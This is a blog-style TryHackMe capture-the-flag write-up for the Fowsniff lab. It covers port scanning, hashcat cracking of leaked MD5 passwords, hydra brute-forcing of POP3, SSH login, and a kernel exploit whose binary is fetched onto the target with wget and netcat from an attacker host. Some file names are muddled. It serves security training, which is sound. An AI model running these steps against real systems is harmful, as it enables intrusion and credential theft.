Tryhackme Write-up Fowsniff CTF

A beginner level easy Capture The Flag(CTF) that challenges beginners to solve variety of tasks using available tools and hacking into a server to steal data. In this post, a course task from HackerU : RED Team Pentester, I will show the steps followed to get the flag.

Basic Checks to be performed before attacking the machine.

1.Power on the Target Machine and make a note of the IP address.

2.Start your Kali Virtual Machine.


# sudo openvpn <vpn-file-name>

Step 1

NMAP (NETWORK MAP) -Enumeration

Let’s start with nmap scan

# nmap -A -sCV -Pn — reason <Target Machine IP>

-A:aggressive scan :basically it runs scripts for common things so you can better understand what you can find useful and what is useless.

sV :version detection:great for searching exploits related to that version of the running services

Pn:Treat all hosts as online:skip host discovery

sC: equivalent to script=default

You can type “man nmap” view summary options.

Discovered open ports are as following and running on Linux Operating System.

  1. SSH
  2. HTTP
  3. POP3
  4. IMAP

Now let’s open it in our web browser and you can see that the site is temporarily out of service.

The page also mentions the offcial twitter account was hacked. In the twitter account , it reveals all the username and passwords are dumped in pastebin.

Let us enumerate the server with gobuster directory search.

gobuster dir -u http://<Target Machine IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.html,.js — timeout 60s

Inspecting robots and license did not yield anything relevant. The server.txt and pastebin content matches and all the MD5 passwords for the usernames are dumped. MD5 would be easier to crack using online tools or hashcat.

Copy all the hash , open txt editor , paste all the hashes and save it as “hash”.I will use hashcat to decrypt the passwords for all the hashes.

hashcat -m 0 hash /usr/share/wordlists/rockyou.txt

  • m is mode and 0 is for md5.
  • hash is the file containing all the hashes.
  • rockyou.txt Points hashcat to the wordlist containing the passwords to hash and compare.
# hashcat -m 0 hash /usr/share/wordlists/rockyou.txt

Copy all the passwords and save it in a file called “pass.txt”. From nmap scan pop3 mail port was open. We can try all combinations one by one manually . I choose to use hydra and see which username and password can be used to login into the mail server.

# hydra -L username -P password -f pop3://<Target Machine IP>

The login and password is still active in the pop3 mail server. NETCAT or TELNET can be used to login into the mail server.

POP3 commands : 5 min read

# telnet <Target Machine IP> <POP3 PORT>

Once you get the message


USER <login name>

PASS <Password>

After supplying the credentials you will get a status message.

TYPE “LIST” and you notice two messages. Use “RETR 1” or “RETR 2” to read the contents of the messages.

First message reveals a temporary password sent by A.J Stone. The second message From baksteen that he will read the mail later. The temporary password could still be active for one of the accounts.

The temporary password does not work for stone login name. Let us try baskteen and ssh was successful.

# ssh <loginame>@<Target Machine IP>

Always with linux machine run sudo -l and we can see that baksteen does not have sudo permissions.

Alternatively we can try kernel exploits.

Type uname -a and kernel is 4.4.0–116 Ubuntu.

Google for an kernel exploit.

The EDB ID number is 44298.

Search for exploit 44298 in your Kali Attacker Machine.

Create a directory exploit. Copy 44298.c to the created directory and you can rename it to exploit.c

Set permission chmod +x 44298.c

Type sudo gcc 44298.c {or} sudo gcc exploit.c . You will notice another output a.out is created.

Transfer 44298.c(compiled) to the Target Machine IP.

# python3 -m http.server
# wget http://<Attacker Kali IP Address>:<Port>/42298.c

In the Target Machine IP, set permission for the compiled kernel exploit for the 44298.c exploit.

# chmod +x 44298.c

Kali Attacker Machine

# nc -nlvp 4444 < a.out

Target or Victim Machine

# nc <Kali Attacker Machine IP> < Port> > 44298.c

Basically , pipe all output into the file called 44298.c .

After the message connect is displayed , go to the Victim Terminal and press CTRL -C.

Now run ./44298.c

# ./44298.c

We go to the root directory and find the file called “flag.txt”. We take a look at the content of the file and find the congratulatory message.




Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
SVR Aravind

SVR Aravind

More from Medium

Virus Total Results for hash: b1629381fa7a48806b761f8689ad9667bee0c73c515604dbbcd6ba3f5c322403